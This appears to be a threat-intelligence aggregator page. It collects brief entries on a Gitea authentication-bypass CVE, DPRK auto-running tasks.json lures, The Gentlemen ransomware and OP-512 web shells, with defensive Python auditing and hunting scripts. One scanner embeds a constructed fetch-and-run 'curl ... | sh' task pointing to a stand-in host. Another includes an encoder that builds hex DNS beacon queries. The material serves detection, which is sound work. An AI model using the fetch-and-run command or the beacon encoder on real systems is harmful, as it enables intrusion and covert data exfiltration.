ctipilot.ch

Die Linke (Germany) — Qilin ransomware, 1.5 TB claimed, DPA notified (April 2026)

incident · incident:die-linke-qilin-2026

Coverage timeline: 2 briefs, first 2026-05-08, last 2026-05-10
Briefs: 2 (2 distinct)
Sources cited: 148 (92 hosts)
Sections touched: 2 (active-threats, weekly_summary)
Co-occurring entities: 8
Appearances: 2 (2026-05-08 to 2026-05-10)

Story timeline

  1. 2026-05-10 · CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · weekly_summary
     Consolidated in the weekly summary for week 2026-W19.
  2. 2026-05-08 · CTI Daily Brief — 2026-05-08 · active-threats
     First coverage in the brief series (incident roughly 4 weeks old at that point; the brief carries a first-coverage recency note). Qilin RaaS; 1.5 TB claimed; DPA notification confirmed; victim statement issued.

Where this entity is cited

  • active-threats: 1
  • weekly_summary: 1

Source distribution

  • thehackernews.com: 17 (11%)
  • bleepingcomputer.com: 10 (7%)
  • therecord.media: 8 (5%)
  • helpnetsecurity.com: 5 (3%)
  • heise.de: 4 (3%)
  • securityweek.com: 4 (3%)
  • bka.de: 2 (1%)
  • blog.checkpoint.com: 2 (1%)
  • other: 96 (65%)

Items in briefs about Die Linke (Germany) — Qilin ransomware, 1.5 TB claimed, DPA notified (April 2026) (44)

CVE-2026-20896 — Gitea (Docker): trust-all reverse-proxy default lets an unauthenticated attacker impersonate any user via `X-WEBAUTH-USER`

From CTI Daily Brief — 2026-06-23 · published 2026-06-23

Gitea 1.26.3 (2026-06-20) and 1.26.4 (2026-06-21) fix a cluster of four flaws; the critical one is CVE-2026-20896 (CVSS 9.8). The official Gitea Docker image shipped with REVERSE_PROXY_TRUSTED_PROXIES defaulting to the wildcard *, so Gitea trusts the reverse-proxy authentication header from any source. Any attacker who can reach the container's HTTP port can therefore send an X-WEBAUTH-USER header naming an arbitrary user, including an administrator, and be authenticated as that user with no credentials (Gitea, 2026-06-21; GitHub Security Advisory GHSA-f75j-4cw6-rmx4, 2026-06-21). Non-Docker deployments are affected only if they also set the wildcard; an explicit trusted-proxy IP or CIDR is unaffected. The same release also patches CVE-2026-27775 (protected-branch enforcement race in single-push batch operations), CVE-2026-20779 (CVSS 7.1; TOTP 2FA bypass via a web-flow TOCTOU race and stateless X-Gitea-OTP replay inside the OTP validity window) and CVE-2026-22874 (SSRF in the webhook and repo-migration subsystems). Germany's BSI issued WID-SEC-2026-2027 on 2026-06-22 rating the set "hoch" (high) (BSI WID, 2026-06-22). No in-the-wild exploitation has been reported yet; the item is included because it meets the brief's threshold for a pre-auth critical in widely deployed software. Gitea is the dominant self-hosted GitHub alternative across DACH/EU public-sector DevOps and sovereign-cloud environments, so an internet-reachable or loosely segmented Docker instance is an immediate admin-takeover risk (T1190 Exploit Public-Facing Application, T1078.001 Default Accounts). Mitigations: set REVERSE_PROXY_TRUSTED_PROXIES to the exact reverse-proxy IP/CIDR, or disable ENABLE_REVERSE_PROXY_AUTHENTICATION entirely if header authentication is not used; upgrade to 1.26.4. Hunt for admin logins sourced from the reverse-proxy IP with no corresponding password-auth audit entry, and for webhook calls to RFC 1918 addresses.
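
The trust-all condition reduces to two settings. The following audit script, an added example rather than Gitea's own code, parses an app.ini and answers whether a request from a given source address could log in simply by setting X-WEBAUTH-USER. The setting names are Gitea's real ones; the two app.ini samples and the addresses are constructed.

```python
"""Audit a Gitea app.ini for the trust-any-proxy header-authentication condition.

Added example; not Gitea project code. ENABLE_REVERSE_PROXY_AUTHENTICATION,
REVERSE_PROXY_AUTHENTICATION_USER and REVERSE_PROXY_TRUSTED_PROXIES are Gitea's
real setting names; both app.ini samples below are constructed.
"""
import configparser
import ipaddress

# Constructed: header auth on and every source trusted (the Docker default the brief describes).
VULNERABLE_INI = """
[service]
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

[security]
REVERSE_PROXY_AUTHENTICATION_USER = X-WEBAUTH-USER
REVERSE_PROXY_TRUSTED_PROXIES = *
"""

# Constructed: only the reverse proxy at 10.0.0.2 may assert a username.
HARDENED_INI = """
[service]
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

[security]
REVERSE_PROXY_AUTHENTICATION_USER = X-WEBAUTH-USER
REVERSE_PROXY_TRUSTED_PROXIES = 10.0.0.2/32
"""


def _load(ini_text: str) -> configparser.ConfigParser:
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep Gitea's upper-case keys as written
    cp.read_string(ini_text)
    return cp


def header_auth_enabled(ini_text: str) -> bool:
    """Gitea ignores the username header entirely when this is false."""
    cp = _load(ini_text)
    return cp.getboolean("service", "ENABLE_REVERSE_PROXY_AUTHENTICATION", fallback=False)


def trusted_proxies(ini_text: str) -> list:
    cp = _load(ini_text)
    # Loopback-only is Gitea's documented default when the key is absent.
    raw = cp.get("security", "REVERSE_PROXY_TRUSTED_PROXIES", fallback="127.0.0.0/8,::1/128")
    return [p.strip() for p in raw.split(",") if p.strip()]


def source_is_trusted(ini_text: str, source_ip: str) -> bool:
    """True if a request arriving from source_ip counts as coming from a trusted proxy."""
    addr = ipaddress.ip_address(source_ip)
    for entry in trusted_proxies(ini_text):
        if entry == "*":
            return True  # wildcard: every client on the network is a 'proxy'
        if addr in ipaddress.ip_network(entry, strict=False):
            return True
    return False


def username_header_honoured(ini_text: str, source_ip: str) -> bool:
    """Both conditions must hold for X-WEBAUTH-USER from source_ip to log a user in."""
    return header_auth_enabled(ini_text) and source_is_trusted(ini_text, source_ip)


def audit(ini_text: str) -> list:
    """Return human-readable findings; an empty list means the header path is not exposed."""
    findings = []
    if not header_auth_enabled(ini_text):
        return findings
    for entry in trusted_proxies(ini_text):
        if entry == "*":
            findings.append("REVERSE_PROXY_TRUSTED_PROXIES is '*': any client can assert a username")
        elif ipaddress.ip_network(entry, strict=False).prefixlen == 0:
            findings.append(f"trusted proxy {entry} covers the whole address space")
    return findings


if __name__ == "__main__":
    for label, ini in (("docker-default", VULNERABLE_INI), ("hardened", HARDENED_INI)):
        print(label, "from 203.0.113.5:", username_header_honoured(ini, "203.0.113.5"), audit(ini))
```

The hardened file trusts only the proxy's own address, so the same header from an arbitrary client is ignored. The header is honoured only when ENABLE_REVERSE_PROXY_AUTHENTICATION is on, which is why disabling it is the complete fix wherever header authentication is not actually in use.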

Check Point State of Ransomware Q1 2026 — ecosystem consolidation, with Switzerland and Germany named

From CTI Weekly Summary — 2026-W25 (Jun 15 – Jun 21, 2026) · published 2026-06-22

Surfaced this week for its CH/EU-specific findings, Check Point's Q1 2026 ransomware report (published 11 May, not covered in the dailies) documents a structural consolidation: the top 10 groups now hold 71.1% of all leak-site victims, the highest concentration since early 2024 and a reversal of two years of fragmentation, meaning defenders face fewer but more professionalised adversaries (Check Point Research; corroborated by Emsisoft). The Gentlemen grew +315% quarter-on-quarter (explaining this week's Mackay Sugar and GentleKiller coverage in § 2) and LockBit 5.0 resurged +106% on a Rust rewrite. The geography is the operative detail for this audience: Check Point notes that Akira accounts for roughly 31% of Swiss ransomware victims, and Emsisoft ranks Germany #2 globally by ransomware victim count. The synthesis a Swiss SOC should take: Akira is the dominant ransomware threat to model against domestically, and the consolidation trend favours investing detection effort against a smaller set of high-capability operators (Qilin, Akira, The Gentlemen, LockBit 5.0).

DPRK UNK_DeadDrop weaponises VS Code / Cursor auto-run to hit developers, including EU targets

From CTI Daily Brief — 2026-06-16 · published 2026-06-16

Proofpoint details UNK_DeadDrop, a North-Korea-aligned cluster (related to but distinct from Contagious Interview / Famous Chollima) that sent 250+ recruitment-themed phishing emails to ~100 finance, crypto, education and technology organisations over April–May 2026 (Proofpoint, 2026-06-15); the targeted geographies are a US majority followed by the UK, Australia, France, Germany and the Netherlands, among others (The Hacker News, 2026-06-16). The lure links to attacker-controlled GitHub/GitLab repositories carrying a .vscode/tasks.json with runOn: folderOpen; VS Code shows a workspace-trust prompt, but Cursor IDE executes the task silently with no prompt, dropping the open-source Overlord Go C2 that steals browser credentials and crypto wallets (The Hacker News, 2026-06-16). Mapped to T1566.002, T1195.001, T1059.004 and T1555.003.

Why it matters to us: public-sector and fintech development teams that have adopted Cursor are exposed to silent execution on repository open. Hunt for editor processes (code, cursor) spawning shell/script interpreters outside build directories (Sysmon EID 1 parent-image filter); enforce workspace-trust policy and restrict VSIX installation to an approved-publisher allowlist via enterprise policy.
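
A pre-open check for the tasks.json pattern described above, added here as an example and not taken from the Proofpoint report: it parses a tasks.json, returns the tasks marked runOn: folderOpen together with the command they would run, and walks a checkout for such files. The key names follow VS Code's documented task schema; both documents and the placeholder URL are constructed.

```python
"""Find workspace tasks that VS Code or Cursor would start automatically on folder open.

Added example; not from the Proofpoint report. "version", "tasks", "runOptions.runOn"
and "presentation.reveal" are keys from VS Code's documented tasks.json schema; the
two documents and the placeholder command are constructed.
"""
import json
import os

# Constructed lure: a hidden shell task that fires on folder open.
MALICIOUS_TASKS_JSON = json.dumps({
    "version": "2.0.0",
    "tasks": [{
        "label": "prepare environment",
        "type": "shell",
        "command": "curl -fsSL https://example.invalid/setup.sh | sh",
        "runOptions": {"runOn": "folderOpen"},
        "presentation": {"reveal": "never"},
    }],
})

# Constructed benign file: a build task that only runs when the user invokes it.
BENIGN_TASKS_JSON = json.dumps({
    "version": "2.0.0",
    "tasks": [{"label": "build", "type": "shell", "command": "npm run build"}],
})


def auto_run_tasks(tasks_json: str) -> list:
    """Return the tasks marked runOn=folderOpen, with the command they would execute."""
    doc = json.loads(tasks_json)  # raises on JSONC comments: inspect such files by hand
    hits = []
    for task in doc.get("tasks", []) or []:
        if not isinstance(task, dict):
            continue
        run_options = task.get("runOptions") or {}
        if run_options.get("runOn") != "folderOpen":
            continue
        presentation = task.get("presentation") or {}
        hits.append({
            "label": task.get("label"),
            "type": task.get("type"),
            "command": task.get("command"),
            "args": task.get("args") or [],
            # reveal=never keeps the terminal panel closed, so the user sees nothing
            "hidden": presentation.get("reveal") == "never",
        })
    return hits


def scan_checkout(root: str) -> list:
    """Walk a cloned repository and report every .vscode/tasks.json carrying auto-run tasks."""
    report = []
    for dirpath, dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8-sig") as fh:
                hits = auto_run_tasks(fh.read())
            if hits:
                report.append({"file": path, "tasks": hits})
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
    return report


if __name__ == "__main__":
    print(auto_run_tasks(MALICIOUS_TASKS_JSON))
```

Real tasks.json files are JSONC and may contain comments, which json.loads rejects; strip them first or treat a parse failure as a reason to read the file manually rather than as a clean result.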

Germany's Bundestag opens first reading of the CRA domestic-implementation bill

From CTI Weekly Summary — 2026-W24 (Jun 08 – Jun 14, 2026) · published 2026-06-14

Drucksache 21/6134, "zur Durchführung der Verordnung (EU) 2024/2847" (on implementing Regulation (EU) 2024/2847), had its first reading on 11 June, designating Germany's national CRA authorities, notified bodies and enforcement routes, with BSI the anticipated primary market-surveillance authority (Deutscher Bundestag). This is distinct from the general CRA notifying-authority deadline the W23 weekly tracked: it is the German legislative step that starts the parliamentary clock (committee stage next, second/third readings and Bundesrat consent expected Q4 2026). The CRA's Chapter IV (notified bodies) became applicable EU-wide the same day. What to do differently: Swiss ICT vendors exporting digital products to the German public sector, and German public-sector procurers, should track committee amendments now, because the national authority designation determines who you report to and who surveils your products under the CRA.

AudiA6 ransomware crypto-laundering service dismantled — two charged, Switzerland among the participating countries

From CTI Daily Brief — 2026-06-12 · published 2026-06-12

A coordinated operation led by the US Secret Service, IRS-CI, Europol and Eurojust — with participation from Australia, Canada, France, Georgia, Germany, Iceland, Japan, Poland, Switzerland and the United Kingdom — dismantled AudiA6 on 11 June, a crypto-laundering service trusted by ransomware operations since 2021 (US Secret Service, 2026-06-11). Two men resident in Batumi, Georgia — Ruslan Igorevich Tkachuk (37) and Alexander Vladimirovich Ledenev (25) — were arrested and charged in the Eastern District of Pennsylvania with conspiracy to launder monetary instruments and sting money laundering. Blockchain analysis traced roughly 10,333 BTC (~$389.7 M at transaction-time value) through AudiA6 wallets, with ~393 BTC directly attributable to darknet markets, ransomware crews and cybercrime services; the service charged 3–10 % commission and returned "cleaned" funds within about an hour through chains of fraudulent exchange accounts opened with stolen identities. Europol links AudiA6 to more than 15 international cybercrime investigations and reports infrastructure seizures in the US, Iceland, Germany and France, alongside the seizure of the Dark2Web forum where the service advertised (Europol, 2026-06-11).

Why it matters to us: the takedown removes a monetisation layer used by ransomware groups that target EU and Swiss organisations, and seized transaction records may retrospectively attribute earlier ransom payments — IR teams with open extortion cases should watch for law-enforcement follow-up requests.

The Gentlemen ransomware: 478 claimed leak-site victims, self-propagating Go encryptor, operator publicly named

From CTI Daily Brief — 2026-06-12 · published 2026-06-12

The Gentlemen — tracked by Microsoft as Storm-2697 and by PRODAFT as Phantom Mantis / LARVA-368 — has claimed 478 victims on its leak site, with victims concentrated in Thailand, the UK, Brazil, Germany and India (The Hacker News, 2026-06-11). Microsoft's technical dissection details a Go encryptor obfuscated with Garble: per-file ephemeral Curve25519 key pairs with XChaCha20 (the ephemeral public key is appended to each encrypted file after an --eph-- marker), a --spread argument that "turns the malware from a single-host encryptor into a self-propagating worm" — simultaneously abusing network shares, scheduled tasks and remote process execution (T1021.002, T1053.005) — and a --full mode that spawns a SYSTEM-context child via a scheduled task named gentlemen_system (Microsoft Threat Intelligence, 2026-05-28). Defence evasion includes disabling Defender real-time monitoring (T1562.001), re-enabling SMBv1 and registry changes for anonymous share access; persistence runs via UpdateSystem/UpdateUser scheduled tasks and Run keys. On 10 June, KrebsOnSecurity published a deanonymisation tracing the operator handle "Hastalamuerte"/"Zeta88" to a named Russian national in Izhevsk, corroborated by Intel 471, Constella and Flashpoint (KrebsOnSecurity, 2026-06-10). Check Point Research documents the affiliate-favourable 90/10 revenue split and reports affiliates obtaining initial access via Fortinet SSL-VPN credentials (Check Point Research, 2026-05-13). Note: Krebs cites 332 published victims since mid-2025 versus the leak site's 478 claim — see § 7.

Why it matters to us: the initial-access pattern is concrete and huntable — review Fortinet SSL-VPN authentication logs for brute-force sequences followed by a first-time successful logon from a new ASN; alert on scheduled-task creation named gentlemen_system/UpdateSystem/UpdateUser (Windows Event ID 4698) and on shadow-copy deletion; treat SMBv1 re-enablement on any host as a high-confidence compromise signal.
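
Two triage checks that follow from the Microsoft write-up, added here as an example rather than Microsoft's tooling: matching Security event 4698 task-creation records against the task names above, and spotting the per-file trailer. The 4698 events are constructed in Windows event XML; the assumption that a raw 32-byte public key immediately follows the --eph-- marker is mine and is not stated in the source, so confirm the offset on a real sample before relying on it.

```python
"""Triage checks for The Gentlemen: scheduled-task creation events and the --eph-- file trailer.

Added example; not Microsoft's code. The task names come from the brief; the 4698
events are constructed in Windows event XML form, and the trailer layout (marker
followed by a raw 32-byte Curve25519 public key) is an assumption.
"""
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
IOC_TASK_NAMES = {"gentlemen_system", "updatesystem", "updateuser"}
EPH_MARKER = b"--eph--"
X25519_KEY_LEN = 32

# Constructed 4698 event: a task with an IOC name created by a service account.
EVENT_4698_GENTLEMEN = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID><Computer>FS01.corp.example</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">svc-backup</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="TaskName">\\gentlemen_system</Data>
  </EventData>
</Event>"""

# Constructed benign 4698 event: a normal Windows maintenance task.
EVENT_4698_BENIGN = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID><Computer>WS42.corp.example</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">anna</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="TaskName">\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</Data>
  </EventData>
</Event>"""


def _event_data(event_xml: str) -> dict:
    """Flatten the <Data Name=...> elements plus EventID and Computer into a dict."""
    root = ET.fromstring(event_xml)
    data = {el.get("Name"): (el.text or "") for el in root.iter(NS + "Data")}
    data["EventID"] = root.findtext(f"{NS}System/{NS}EventID") or ""
    data["Computer"] = root.findtext(f"{NS}System/{NS}Computer") or ""
    return data


def suspicious_task_creation(event_xml: str):
    """Return (computer, user, task) when a 4698 event creates one of the IOC task names."""
    ev = _event_data(event_xml)
    if ev.get("EventID") != "4698":
        return None
    # TaskName is a path such as \Microsoft\Windows\...\Name; compare the leaf only.
    leaf = ev.get("TaskName", "").rsplit("\\", 1)[-1].lower()
    if leaf not in IOC_TASK_NAMES:
        return None
    user = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
    return (ev["Computer"], user, leaf)


def ephemeral_public_key(data: bytes):
    """Return the per-file public key if the file ends in the --eph-- trailer, else None."""
    idx = data.rfind(EPH_MARKER)
    if idx < 0:
        return None
    start = idx + len(EPH_MARKER)
    key = data[start:start + X25519_KEY_LEN]
    return key if len(key) == X25519_KEY_LEN else None


# Constructed encrypted-file stand-in: opaque bytes, then the trailer and a dummy key.
SAMPLE_ENCRYPTED = b"\x8f\x11opaque-ciphertext\x00\x7c" + EPH_MARKER + bytes(range(X25519_KEY_LEN))

if __name__ == "__main__":
    print(suspicious_task_creation(EVENT_4698_GENTLEMEN))
    print(ephemeral_public_key(SAMPLE_ENCRYPTED).hex())
```

The public key recovered from a file is the ephemeral half of the per-file key agreement; without the operator's private key it does not yield the file key, but it is a stable per-file artefact for confirming which files the encryptor touched.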

Black Lotus Labs: the Volt Typhoon-linked JDY botnet doubles to 1,500+ devices and weaponises CVE disclosures within hours

From CTI Daily Brief — 2026-06-11 · published 2026-06-11

Lumen's Black Lotus Labs reports that the JDY botnet — the reconnaissance cluster that survived the 2024 KV-botnet takedown and is assessed with high confidence to support multiple China-nexus actors including Volt Typhoon — has more than doubled from roughly 650 bots in January 2024 to over 1,500 compromised SOHO and IoT devices (Lumen Black Lotus Labs, 2026-06-10). The botnet now spans Cisco, Araknis, Mimosa Networks, Ubiquiti, Draytek, Hikvision and Linksys devices, performs multiprotocol service fingerprinting, banner-grabbing and TLS-certificate collection at scale, and routes C2 through hidden Tor services while managing victims with the open-source Platypus reverse-shell server. The operationally significant finding: scanning of Fortinet devices spiked within hours of the public disclosure of CVE-2026-35616, demonstrating sub-24-hour integration of new vulnerability intelligence into the recon-to-exploitation pipeline (The Hacker News, 2026-06-10). Targeting centres on US military and associated entities, with distributed European nodes. Technique mapping: T1595.002 Active Scanning: Vulnerability Scanning, T1590 Gather Victim Network Information, T1584.005 Compromise Infrastructure: Botnet.

Why it matters to us: JDY scanning should be treated as a precursor to targeted exploitation, not background noise — the sub-24-hour weaponisation window means CH/EU public-sector and critical-infrastructure operators must compress patch cycles for internet-facing edge appliances to hours, not weeks, after a disclosure. Hunt for outbound connections from edge/SOHO devices to the Platypus default service, unusual high-rate outbound SYN scanning, and unexpected TLS-certificate harvesting.

NCSC-CH Week 23: coordinated surge in job-seeker targeting — fake interviews, reshipping identity theft, and LinkedIn-to-GitHub infostealer delivery

From CTI Daily Brief — 2026-06-10 · published 2026-06-10

NCSC Switzerland's Week 23 report (9 June) documents three concurrent technique chains aimed at job seekers in Switzerland (NCSC-CH, 2026-06-09). The first sends fake interview-confirmation emails for plausible Swiss employers, linking to a counterfeit Google login that harvests credentials (T1566.002, T1078). The second uses fraudulent job offers demanding identity documents for "onboarding," with stolen Swiss IDs then used to order goods and run parcel-reshipping (freight-forwarder) fraud. The third operates through compromised LinkedIn recruiter profiles that direct candidates to download a "technical assessment" or "onboarding" GitHub repository carrying infostealer malware that targets crypto wallets, browser cookies and saved credentials (T1566.003, T1059.001, T1555). NCSC notes attackers systematically exploit applicants' urgency and unfamiliarity with new-employer processes to lower vigilance.

Why it matters to us: the LinkedIn→GitHub chain is a credible vector into corporate endpoints via employees in job-search mode and HR/talent teams handling external candidate code. Detection signal: git clone / GitHub downloads followed by script execution minutes after a LinkedIn contact (Sysmon EID 1, parent git.exe / python.exe from a freshly-cloned path). This is a national-CERT primary disclosure for its own jurisdiction.

Five Eyes "Safeguarding Our Secrets" — Chinese military intelligence systematically recruiting via LinkedIn and job platforms

From CTI Weekly Summary — 2026-W23 (1–7 June 2026) · published 2026-06-08

On 2026-06-03 the five Five Eyes domestic intelligence agencies (ASIO, CSIS, FBI, MI5, NZSIS) released a joint bulletin warning that China's military-intelligence apparatus is systematically using professional-networking and freelance-work platforms — LinkedIn, Indeed, Upwork — to identify and cultivate cleared personnel, academics, researchers and defence/policy staff (MI5; The Record, 2026-06-03; daily 2026-06-06). The tradecraft: operatives pose as recruiters or think-tank staff for fabricated cover companies outside China, open with benign foreign-policy research commissions paying hundreds to a few thousand dollars per deliverable, then escalate toward sensitive material and migrate the relationship to encrypted messaging to reduce platform visibility. Switzerland — outside Five Eyes but a hub for international organisations, financial regulation, and dual-use research — is squarely in the target set. The defensible surface is personnel-security, not EDR: brief cleared and research staff on the innocuous-task-to-sensitive-request progression and give them a low-friction route to report unsolicited foreign-recruitment contact.

TA4922 — China-nexus cybercrime cluster expands from Japan into Germany, UK and Italy with native-language lures and Atlas RAT

From CTI Weekly Summary — 2026-W23 (1–7 June 2026) · published 2026-06-08

Proofpoint reported this week that TA4922, a Chinese-speaking financially-motivated cluster running the highest campaign tempo of any cybercrime actor Proofpoint tracks, pivoted in March–April 2026 to localised campaigns against German, UK, Italian and South African organisations (The Hacker News, 2026-06-04; BleepingComputer, 2026-06-04; daily 2026-06-05). Native-language tax-authority, HR/payroll and invoice lures now pair the known ValleyRAT (Winos 4.0) with newly observed Atlas RAT (C-based), RomulusLoader, and SilentRunLoader (Python infostealer targeting Chrome credentials). A notable TTP shift: conversations are moved to LINE, WhatsApp and Microsoft Teams before payload delivery, pulling targets off enterprise email controls. DACH public-sector and finance staff are in direct scope. Hunt for DLL side-loading chains where AnyDesk/SyncFuture load from unexpected user-profile paths, for Python processes reaching Chrome DPAPI, and for unsolicited inbound contact on Teams/WhatsApp that pivots to a "document."

Germany's Gesetzentwurf zur Stärkung der Cybersicherheit: cabinet-approved active-cyberdefence powers for BKA, Bundespolizei and BSI

From CTI Weekly Summary — 2026-W23 (1–7 June 2026) · published 2026-06-08

On 27 May 2026 the German Federal Cabinet adopted the Gesetzentwurf zur Stärkung der Cybersicherheit (draft law to strengthen cybersecurity), which now proceeds to the Bundestag (German Federal Government, 2026-05-27; Digital Watch Observatory, 2026-05-31). The bill would grant the BKA and Bundespolizei authority to shut down or disrupt attacker-controlled infrastructure, including servers located outside Germany, to reroute data traffic, and to collect, modify or delete data on foreign systems; the BSI would gain expanded authority to collect threat-preparation data and to require telecoms and major platforms to relay BSI threat warnings to end users. Interior Minister Dobrindt: "In future, we will target the attacker, their servers, their software and their strategy." Personnel implications: BKA +264, Bundespolizei +90, BSI +21 positions by 2030. Civil-society analysis flags constitutional concerns (Basic Law, cross-border state action, jurisdictional conflict with the Länder). For DACH/EU defenders: (a) once enacted, telecoms and platform operators gain a new duty to relay BSI warnings; (b) the law sets a precedent for EU active-cyberdefence norms that Switzerland's forthcoming cyber-resilience legislation (draft expected autumn 2026) will need to address.

Five Eyes joint bulletin: Chinese military intelligence recruiting cleared personnel through LinkedIn and job platforms

From CTI Daily Brief — 2026-06-06 · published 2026-06-06

On 2026-06-03 the five Five Eyes domestic-intelligence services (ASIO, CSIS, FBI, MI5, NZSIS) released an unusual joint bulletin, Safeguarding Our Secrets, warning that China's military-intelligence apparatus is systematically using professional-networking and freelance-work platforms — LinkedIn, Indeed, Upwork — to identify and cultivate people with access to classified or otherwise privileged information (MI5, 2026-06-03; The Record, 2026-06-03). Operatives pose as recruiters, consultants, HR representatives or think-tank staff for fabricated cover companies outside China, open with benign foreign-policy / defence / trade research commissions paying hundreds to a few thousand dollars per deliverable, then escalate toward sensitive material and migrate the relationship to encrypted messaging to reduce platform visibility. Named target categories include security-clearance holders, military personnel, academics, researchers and journalists.

Why it matters to us: This is a human-intelligence tradecraft advisory rather than a technical-intrusion one, and Switzerland — outside Five Eyes but a hub for international organisations, financial regulation and dual-use research — is squarely in the target set. The defensible surface is personnel-security, not EDR: brief cleared and research staff on the innocuous-task-to-sensitive-request progression, give them a low-friction route to report unsolicited foreign-recruitment contact, and treat unsolicited "paid policy paper" approaches to staff with administrative or network access as a counter-intelligence signal, not a side gig.

OP-512: China-linked cluster runs a cryptographically-unique, self-reporting IIS web-shell framework against legacy .NET servers [SINGLE-SOURCE]

From CTI Daily Brief — 2026-06-06 · published 2026-06-06

ReliaQuest documented OP-512, a previously-unreported China-linked espionage cluster targeting internet-facing Microsoft IIS servers running end-of-life .NET Framework 4.0 (ReliaQuest, 2026-06-05) [SINGLE-SOURCE — ReliaQuest original disclosure]. The framework is a three-component web shell — one .aspx file manager plus two .ashx command handlers — that is per-deployment cryptographically unique (RSA signatures and RC4 keys differ per installation), defeating signature-based detection. It carries a timestomping module that matches shell file timestamps to surrounding legitimate IIS artefacts (T1070.006 Timestomp), uses reflective .NET assembly loading to bypass static scanning (T1620), and implements a novel self-reporting beacon: the deployed shell's URL is hex-encoded into a DNS subdomain query issued from w3wp.exe, so the operator is notified of a live shell without actively scanning for it. ReliaQuest found initial access roughly 75 days before the shell was deployed, consistent with patient espionage tradecraft, and notes overlap with the hex-encoded-DNS technique seen in CL-STA-0048 while assessing OP-512 as a separate cluster.

Why it matters to us: Many Swiss and EU public-sector estates still run legacy IIS/ASP.NET portals and intranet apps on .NET 4.0 — exactly OP-512's stated footprint. The detection lesson is concrete: filesystem timestamps are useless for triage here (timestomped), so hunt on behaviour instead — w3wp.exe issuing long hex-string DNS subdomain queries, w3wp.exe spawning cmd.exe/powershell.exe/csc.exe (Sysmon EID 1), reflective-assembly loads, and .aspx/.ashx writes into web roots (Windows Security EID 4663 on inetsrv paths). Hardening: isolate or retire .NET 4.0 servers and apply WDAC/AppLocker to block execution of unsigned web-root artefacts.
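
The hunt named above (w3wp.exe issuing long hex subdomain queries) in code, as an added example rather than ReliaQuest's own detection: an illustrative encoder shows how a URL becomes a chain of hex DNS labels, and the decoder reverses it over constructed Sysmon event 22-style records. The encoding is the generic technique, not OP-512's exact format, and the zone and URL are invented.

```python
"""Hunt for hex-encoded beacons in DNS queries issued by IIS worker processes.

Added example; not ReliaQuest's code. The sample records are constructed in the
shape of Sysmon event 22 (Image, QueryName); the encoder shows how such a beacon
is typically built and is not OP-512's exact scheme.
"""
import re
import string

HEX_LABEL = re.compile(r"^[0-9a-fA-F]{2,63}$")
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")
MIN_HEX_CHARS = 16  # below this, hex-looking labels are usually legitimate hashes or IDs


def encode_as_subdomain(payload: bytes, zone: str) -> str:
    """Illustrative: hex-encode, split into <=63-char labels, prepend to an attacker zone."""
    hexstr = payload.hex()
    labels = [hexstr[i:i + 60] for i in range(0, len(hexstr), 60)]
    return ".".join(labels) + "." + zone


def hex_subdomain_payload(query_name: str):
    """Decode the leading run of hex labels in a query name; None if there is no such run."""
    run = []
    for label in query_name.rstrip(".").split("."):
        if HEX_LABEL.match(label):
            run.append(label)
        else:
            break  # the first non-hex label starts the real zone
    joined = "".join(run)
    if len(joined) < MIN_HEX_CHARS or len(joined) % 2:
        return None
    return bytes.fromhex(joined)


def mostly_printable(data: bytes, threshold: float = 0.9) -> bool:
    """Decoded beacons carry URLs or paths, so the bytes should be almost all printable."""
    return bool(data) and sum(b in PRINTABLE for b in data) / len(data) >= threshold


# Constructed Sysmon-22-style records. The zone deliberately has no hex-only labels.
SAMPLE_DNS_EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "QueryName": encode_as_subdomain(b"https://portal.example.ch/upload/x.ashx", "beacon.example.invalid")},
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "QueryName": "ocsp.digicert.com"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "deadbeefdeadbeefdeadbeef.cdn.example.invalid"},
]


def hunt(events, worker: str = "w3wp.exe") -> list:
    """Flag DNS queries from the IIS worker whose leading labels decode to text."""
    hits = []
    for ev in events:
        image = ev.get("Image", "").lower().replace("/", "\\")
        if not image.endswith("\\" + worker):
            continue
        payload = hex_subdomain_payload(ev.get("QueryName", ""))
        if payload is None:
            continue
        hits.append({
            "query": ev["QueryName"],
            "decoded": payload.decode("utf-8", "replace"),
            "printable": mostly_printable(payload),
        })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_DNS_EVENTS):
        print(hit["decoded"], hit["printable"])
```

A zone whose own labels are hex (for example cafe.example) would be swallowed into the decoded run; in production, cut the run at the registrable domain using a public-suffix list before decoding.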

Proofpoint TA4922: a China-nexus cybercrime cluster expands from Japan into Germany, the UK and Italy with native-language lures and DLL-side-loaded Atlas RAT

From CTI Daily Brief — 2026-06-05 · published 2026-06-05

Proofpoint reports that TA4922, a Chinese-speaking, financially-motivated cluster it assesses as running the highest campaign tempo of any cybercrime actor it tracks, expanded in March–April 2026 from its historical Japanese focus to localised campaigns against UK, German, Italian and South African organisations (The Hacker News, 2026-06-04; BleepingComputer, 2026-06-04). Lures are carefully tailored in the target's native language — tax-authority, HR/payroll and invoice themes — and the toolkit now pairs the known ValleyRAT (Winos 4.0) with newly observed families: Atlas RAT (a C-based RAT) and RomulusLoader, which DLL-side-loads (T1574.002) AnyDesk and SyncFuture, plus SilentRunLoader, a Python infostealer pulling Chrome credentials and cookies (T1555.003). A notable TTP shift is the deliberate move of conversations to LINE, WhatsApp and Microsoft Teams to pull targets off enterprise email controls before payload delivery.

